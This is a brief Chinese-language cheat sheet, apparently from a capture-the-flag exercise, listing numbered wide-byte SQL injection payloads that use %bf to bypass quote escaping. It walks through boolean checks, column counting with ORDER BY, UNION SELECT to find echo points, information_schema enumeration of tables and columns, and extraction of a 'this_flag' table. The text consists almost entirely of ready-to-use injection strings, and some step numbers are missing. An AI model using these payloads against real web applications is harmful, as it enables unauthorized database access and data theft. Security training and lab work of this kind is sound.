1、' and 1=1 %23   //不報錯

' and 1=2 %23   //報錯

2、id=1%bf' order by 5 %23    //檢視字段數,即列數

3、id=1%bf' and 1=2  union select 1,2,3,4,5%23   //查詢回顯點

//查詢有哪些資料庫,  該語句查出了全部的資料庫

5、id=1%bf' and 1=2 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema = 'kzf' %23  //查詢kzf中有哪些表

1)先select database()找出當前資料庫 【可省略】

2)將'kzf'改為 select database()


id=1%bf' and 1=2 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema =(select database()) and table_name =0x746869735f666c6167 %23  //查詢this_flag的欄位名

7、id=1%bf' and 1=2 union select 1,id,flag,4,5 from this_flag %23   //獲取字段內容

SQL注入 寬位元組注入

